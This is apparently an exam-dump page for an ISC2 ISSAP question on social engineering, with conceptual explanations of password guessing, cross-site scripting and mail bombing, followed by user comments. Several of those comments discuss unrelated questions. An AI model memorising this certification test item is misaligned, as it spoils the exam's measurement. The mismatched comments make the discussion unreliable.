New Year Sale 2026! Hurry Up, Grab the Special Discount - Save 25% - Ends In 00:00:00 Coupon code: SAVE25
Welcome to Pass4Success

- Free Preparation Discussions
Mail Us support@pass4success.com
Location US
Mob_nav_barsMENU

ISC2 ISSAP Exam - Topic 4 Question 3 Discussion

Actual exam question for ISC2's ISSAP exam
Question #: 3
Topic #: 4
[All ISSAP Questions]

Which of the following types of attack can be used to break the best physical and logical security mechanism to gain access to a system?

Show Suggested Answer Hide Answer
Suggested Answer: A

Social engineering is the art of convincing people and making them disclose useful information such as account names and passwords. This

information is further exploited by hackers to gain access to a user's computer or network. This method involves mental ability of the people to

trick someone rather than their technical skills. A user should always distrust people who ask him for his account name or password, computer

name, IP address, employee ID, or other information that can be misused.

Answer option D is incorrect. A password guessing attack occurs when an unauthorized user tries to log on repeatedly to a computer or

network by guessing usernames and passwords. Many password guessing programs that attempt to break passwords are available on the

Internet. Following are the types of password guessing attacks:

Brute force attack

Dictionary attack

Answer option B is incorrect. A cross site scripting attack is one in which an attacker enters malicious data into a Website. For example, the

attacker posts a message that contains malicious code to any newsgroup site. When another user views this message, the browser

interprets this code and executes it and, as a result, the attacker is able to take control of the user's system. Cross site scripting attacks

require the execution of client-side languages such as JavaScript, Java, VBScript, ActiveX, Flash, etc. within a user's Web environment. With

the help of a cross site scripting attack, the attacker can perform cookie stealing, sessions hijacking, etc.

Answer option C is incorrect. Mail bombing is an attack that is used to overwhelm mail servers and clients by sending large amount of

unwanted e-mails. The aim of this type of attack is to completely fill the recipient's hard disk with immense, useless files, causing at best

irritation, and at worst total computer failure. E-mail filtering and properly configuring email relay functionality on mail servers can be helpful for

protection against this type of attack.


by Carmelina at May 06, 2022, 06:05 AM

Limited Time Offer

25%

Off

Get Premium ISSAP Questions as Interactive Web-Based Practice Test or PDF

Contribute your Thoughts:

0/2000 characters
Submit Cancel
Howard
4 months ago
Cross site scripting can be serious too, but not for physical access.
upvoted 0 times
...
Roselle
4 months ago
Totally agree with A, it's all about manipulating people.
upvoted 0 times
...
Nada
4 months ago
Wait, can mail bombing really break security? Sounds off.
upvoted 0 times
...
Rosio
4 months ago
I think D is also a big threat, password guessing is common.
upvoted 0 times
...
Miesha
5 months ago
Definitely A, social engineering is super effective.
upvoted 0 times
...
Eun
5 months ago
I feel like mail bombing is more about overwhelming a system rather than breaking security, so I’m leaning towards social engineering for this one.
upvoted 0 times
...
Levi
5 months ago
Social engineering seems like the right answer since it can manipulate people into giving access, but I wonder if cross site scripting could also be a contender in some scenarios.
upvoted 0 times
...
Ahmad
5 months ago
I remember practicing a question similar to this, and I think password guessing attacks are more about brute force rather than bypassing security mechanisms.
upvoted 0 times
...
Ammie
5 months ago
I think social engineering attacks are really effective because they exploit human psychology, but I'm not entirely sure if they can break both physical and logical security.
upvoted 0 times
...
Jeffrey
5 months ago
This one seems pretty straightforward. I'm pretty confident the answer is true - an SSH private key should never be shared with other users or systems.
upvoted 0 times
...
Paz
5 months ago
Hmm, I'm not sure about this one. HIPAA, ISO27001, and PCI DSS all seem like they could be relevant for healthcare data. I'll need to think this through carefully.
upvoted 0 times
...
Mohammad
5 months ago
Okay, I think I've got it. The key is to remember that a Node Manager is configured at the machine level, not the domain level.
upvoted 0 times
...
Brock
5 months ago
Okay, I think I've got this. The key is to identify the number of factors (pens, paper, school diary, bag) and then use the pairwise testing formula to calculate the minimum number of test cases. Let me work through this step-by-step.
upvoted 0 times
...
Rosendo
5 months ago
Hmm, this seems like a tricky one. I'll need to think through the different Outlook settings carefully to figure out the best approach.
upvoted 0 times
...

Save Cancel